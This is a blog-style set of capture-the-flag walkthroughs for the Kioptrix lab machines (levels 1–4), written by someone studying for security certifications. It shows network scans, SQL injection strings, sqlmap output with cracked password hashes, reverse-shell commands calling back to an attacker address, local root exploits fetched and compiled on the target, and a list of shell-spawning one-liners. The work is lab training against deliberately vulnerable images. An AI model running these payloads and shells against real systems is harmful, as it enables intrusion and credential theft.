I have decided to start studying towards a CISSP and / or an OSCP, as part of that I saw an excellent blog post recommending to go through a lot of CTF challenges from vulnhub.com. These are my Kioptrix walkthrough guides / findings and observations for each of the first 4 available kioptrix images.
Kioptrix Walkthrough Level 1
For the first installation, I was following the walkthrough guides available on the net. Most guides say the first step is to map the network.
netdiscover
# or
nmap -sn 192.168.x.x/24
You can see my versions for mapping networks here: https://jonathansblog.co.uk/linux-commands-for-networking#advanced-linux-network-commands
nmap -sn 192.168.x.x/24
Currently scanning: 192.168.x.x/16 | Screen View: Unique Hosts
40 Captured ARP Req/Rep packets, from 14 hosts. Total size: 2400
IP At MAC Address Count Len MAC Vendor / Hostname
192.168.x.x 60:c5:47:0d:11:52 22 1320 Apple, Inc.
192.168.x.x 00:0c:29:ba:32:66 1 60 VMware, Inc.
Next, scan the host and get version info for services
nmap -sV 192.168.x.x
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http syn-ack Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind syn-ack 2 (RPC #100000)
139/tcp open netbios-ssn syn-ack Samba smbd (workgroup: 7MYGROUP)
443/tcp open ssl/http syn-ack Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status syn-ack 1 (RPC #100024)
Next thing is searchsploit (run everything through it)
searchspliot
Then, choice between the results (also, a general google search is great here, as is a search on exploit db)
Kioptrix walkthrough – SSHD
** try to log in with blank creds
** try to log in with default creds (eg root/toor)
SMB
enumeration
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
enum4linux
nmap --script smb-vuln* -p 139,445 192.168.x.x
HTTPD
** manually browse http server
** manually wget the robots.txt
** try to log in with blank creds
** try to log in with default creds (eg root/toor)
** manually browse http server
** manually wget the robots.txt
nikto -h 192.168.x.x
dirbuster
There will be programs to run for other services too
First thing to note is that everything on this host is ancient
You can see that the version of apache and openssl are very old
A quick google for apache 1.3.20 vulnerability (excluding all the walkthorugh guides) shows OpenFuck.c
From exploitdb we can also see the original exploit:
https://www.exploit-db.com/exploits/764
From searchsploit, we can see that we have the source already in kali
searchsploit openfuck
There is a link at the top of the exploit. which takes us here:
http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
Following the instructions still cant compile the exploit (its 13 years old at this point). A quick google for ‘openfuck kali compile’ gives us this:
https://github.com/heltonWernik/OpenLuckWhich compiles nicely :D Running is just a matter of:
./OpenFuck target box [port]
Target is a list of hex codes for specific platform / apache version combinations (eg redhat / apache-1.3.20 is 0x6a and 0x6b) [try them both…]
Kioptrix walkthrough – Listeners
On kali machine:
nc -nlvp 8080
Once you have a shell, on target machine, execute:
bash -i >& /dev/tcp/192.168.x.x/8080 0>&1
Boom.
Kioptrix walkthrough Level 2
Start with mapping the network:
netdiscover
# or
nmap -sn 192.168.x.x/24
You can see my versions for mapping networks here: https://jonathansblog.co.uk/linux-commands-for-networking#advanced-linux-network-commands
Currently scanning: 192.168.x.x/16 | Screen View: Unique Hosts
40 Captured ARP Req/Rep packets, from 14 hosts. Total size: 2400
IP At MAC Address Count Len MAC Vendor / Hostname
192.168.x.x 60:c5:47:0d:11:52 22 1320 Apple, Inc.
192.168.x.x 00:0c:29:ba:32:66 1 60 VMware, Inc.
Then an nmap of the host
root@kali:~# nmap -sV 192.168.x.x
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-03 20:25 UTC
Nmap scan report for 192.168.x.x
Host is up (0.016s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
800/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 70:56:81:BE:16:0B (Apple)
Kioptrix walkthrough – SSHD
** try to log in with blank creds
** try to log in with default creds (eg root/toor)
HTTPD
** manually browse http server
** manually wget the robots.txt
Spider the website
nikto -h 192.168.x.x
dirbuster
Sqli (very basic, but try all input boxes with the following)
' or '1' = '1
Command injection
; cat/etc/passwd
Listener
On kali machine:
nc -nlvp 8080
On target (in the input field), paste
;bash -i >& /dev/tcp/192.168.x.x/8080 0>&1
Boom. you have a shell
Expliots
exploitdb.com/exploits/1397
exploitdb.com/exploits/9542
Compile with:
gcc -o 1397 1397.c
gcc -o 9542 9542.c
Spawn a quick http server (on kali box)
python -m SimpleHTTPServer 8080
In kioptix, cd to /tmp (you cant write anywhere else) then
cd /tmp
wget http://192.168.x.x:8080/1397
wget http://192.168.x.x:8080/9542
You’ll see that this doesn’t work (because the vm is 32 bit), even gcc -m32 didn’t work for me. So, inside kioptix /tmp, wget the exploits, compile and run.
cd /tmp
wget http://exploitdb.com/download/1397.c
wget http://exploitdb.com/download/9542.c
gcc -o 1397 1397.c
gcc -o 9542 9542.c
chmod +x 1397
chmod +x 9542
./1397
./9542
Boom. you got root (and lots of things to tidy up).
Kioptrix Walkthrough Level 3
As usual, start by getting info on the machines in the network
netdiscover
nmap -sn 192.168.x.x/24
Currently scanning: 192.168.x.x/16 | Screen View: Unique Hosts
40 Captured ARP Req/Rep packets, from 14 hosts. Total size: 2400
IP At MAC Address Count Len MAC Vendor / Hostname
192.168.x.x 60:c5:47:0d:11:52 22 1320 Apple, Inc.
192.168.x.x 00:0c:29:ba:32:66 1 60 VMware, Inc.
Once you have the IP address, an nmap is in order
nmap -sV 192.168.x.x
And we can see that there is a (very) old apache / php running
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-08 19:10 UTC
Nmap scan report for 192.168.x.x
Host is up (0.011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 70:56:81:BE:16:0B (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SSH
Exploits:
cvedetails.com/version/169731/Openbsd-Openssh-4.7p1.html
No code execution or priv escalations :(
HTTPD
** manually browse http server
** manually wget the robots.txt
Spider the website
nikto -h 192.168.x.x
dirbuster for httpd
Exploits:
https://httpd.apache.org/security/vulnerabilities_22.html
https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-77221/hasexp-1/Apache-Http-Server-2.2.8.html
There is one with a CVE score of 7.8
php
Searching google for “PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch vulnerability” we find https://www.exploit-db.com/exploits/29290
An exploit that will give us code execution which should work on our machine, except it doesnt compile on kali :(
We could modify it (for a few hours), so we will keep this as a ‘maybe’
Browsing the app on http, we find that there is a login form, which we check for sqli
http://kioptrix3.com/index.php?system=Admin&page=loginSubmit
POST
username=1' or '1'='1
password=1' or '1'='1
It doesn’t work, but there are other forms, so we check those too
Crawling the site
Spider the website
(seofrog is fantastic for this)
- http://kioptrix3.com/gallery/vote.php?id=5&vote=4&from=%2Fgallery%2Fp.php%2F5%3F%3F
- http://kioptrix3.com/index.php?system=Blog&post=1281005380
- http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos
- http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename#photos
We find that the ID parameter is injectable (skipfish shows us)
We run an sqlmap (very noisy, but we are n00bs at this stage, so we run it anyway)
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs
We then get lots of information:
sqlmap identified the following injection point(s) with a total of 111 HTTP(s) requests:
sqlmap identified the following injection point(s) with a total of 111 HTTP(s) requests:
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (2170=2170) THEN 1 ELSE (SELECT 4104 UNION SELECT 2961) END))
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(5709,4486)>(SELECT COUNT(),CONCAT(0x716a6b7671,(SELECT (ELT(5709=5709,1))),0x7178717171,FLOOR(RAND(0)2))x FROM (SELECT 1973 UNION SELECT 7702 UNION SELECT 7453 UNION SELECT 7745)a GROUP BY x)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)
Type: UNION query
Title: MySQL UNION query (random number) - 6 columns
Payload: id=1 UNION ALL SELECT 1980,CONCAT(0x716a6b7671,0x545a47644e42704f6c746a754474645973424c7541625778574e657552446a6467496359744e425a,0x7178717171),1980,1980,1980,1980#
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
available databases [3]:
[] gallery [] information_schema
[*] mysql
We can then run sqlmap -a on the id parameter and get a dump of all the databases.
There is a table in the gallery database that looks interesting: dev_accounts
dreg,0d3eccfb887aabd50f243b3f155c0f85
loneferret,5badcaf789d3d1d09794d8f021f40f0e
We run those through an online md5 database and get the following:
dreg: Mast3r
loneferret: starwars
The first thing we try is to log in to the machine (and any other services)
Going back to the admin area, we find that it running lotuscms, a quick google search shows this:
https://www.rapid7.com/db/modules/exploit/multi/http/lcms_php_exec
An RCE, just what we need :) There is also an exploit: exploit-db.com/exploits/1596. Its in python, which is nice
./15964 -t http:192.168.x.x -d /
It doesn’t work on my kali box, so I add this to the ‘maybe’ pile
I try logging in with ssh and it works.
I do a quick LS and see a file called ‘checksecurity’ and another called companypolicy
Reading the company policy doc reveals that everyone has to use ‘sudo ht’ to make edits.
Running sudo ht allows me to edit the /etc/sudoers file and add /bin/sh
I can then sudo sh and get root.
Kioptrix Walkthrough Level 4
Starting with the network mapping:
netdiscover
Currently scanning: 192.168.x.x/16 | Screen View: Unique Hosts
40 Captured ARP Req/Rep packets, from 14 hosts. Total size: 2400
IP At MAC Address Count Len MAC Vendor / Hostname
192.168.x.x 60:c5:47:0d:11:52 22 1320 Apple, Inc.
192.168.x.x 00:0c:29:ba:32:66 1 60 VMware, Inc.
Or an nmap -sn 192.168.x.x/24
Once you have the IP address, an nmap is in order
nmap -sS -A -n 192.168.x.x
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-17 15:14 UTC
Nmap scan report for 192.168.x.x
Host is up (0.00053s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:BA:32:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|clock-skew: mean: 48m30s, deviation: 2h49m43s, median: -1h11m30s |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.28a) | Computer name: Kioptrix4 | NetBIOS computer name: | Domain name: localdomain | FQDN: Kioptrix4.localdomain | System time: 2019-04-17T10:03:19-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.x.x
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Ubuntu
Running: Linux 2.6.X (inux 2.6.9 - 2.6.33)
services:
ssh 4.7p1 Debian 8ubuntu1.2
http
Apache/2.2.8 (Ubuntu)
PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
Samba smbd 3.0.28a
SMB
** try to log in with blank creds
** try to log in with default creds (eg root/toor)
** manually browse http server
** manually wget the robots.txt
Enumeration:
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
enum4linux 192.168.x.x
We get a list of users:
- loneferret
- john
- root
- robert
- nobody
nmap --script smb-vuln* -p 139,445 192.168.x.x
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-17 16:42 BST
Nmap scan report for 192.168.0.23
Host is up (0.00060s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|smb-vuln-ms10-054: false |_smb-vuln-ms10-061: false | smb-vuln-regsvc-dos: | VULNERABLE: | Service regsvc in Microsoft Windows systems vulnerable to denial of service | State: VULNERABLE | The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference | pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes | while working on smb-enum-sessions. |
Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds
We have a possible vulnerability
smbclient -L 192.168.x.x
HTTPD
- https://www.exploit-db.com/exploits/42745
- https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-77221/Apache-Http-Server-2.2.8.html
Try a basic sqli:
user: '
pass: '
We see an error message (Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28)
user: john
pass: 1' or '1' = '1
We get a screen that shows the password for the user john
We can then log in to ssh :)
ssh john@192.168.x.x
From this point, I had to use a guide, the process went:
- Dig about in the php source code, find the creds to the database (I had found these, but hadn’t done anything with them)
- Then you get the creds for the ‘root’ mysql user
- Then check which user mysql runs as (root)
- Then check for a mysql function that allows system calls
- Then issue a system call to add john to the admin group
- Then sudo su
- Then you have root..
Overall learning:
I took a lot form the various walkthroughs that I read (I tried to defeat the systems myself, but had to resort to various walkthrough guides at various points)
The obvious things that I learned are that not everything has to be a software bug / some exploits are purely configuration
Nmap
Stealthy nmap scans are better:
instead of nmap -sn, use
nmap -Pn --disable-arp-ping -sT --top-ports 20 --open
nmap -Pn --disable-arp-ping -sS -p- -T4 --defeat-rst-ratelimit
And also try
nmap -Pn --disable-arp-ping -p 22,80,111,139,443,1024 -sT -sV -A 10.200.1.3
nmap -Pn --disable-arp-ping -p 111,137,138,1026 -sU -sV -A 10.200.1.3
Spawning shells
There are tons of ways to spawn a shell:
bash -i >& /dev/tcp/192.168.x.x/8080 0>&1
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
#(From within IRB)
exec "/bin/sh"
#(From within vi)
:!bash
#(From within vi)
:set shell=/bin/bash:shell
#(From within nmap)
!sh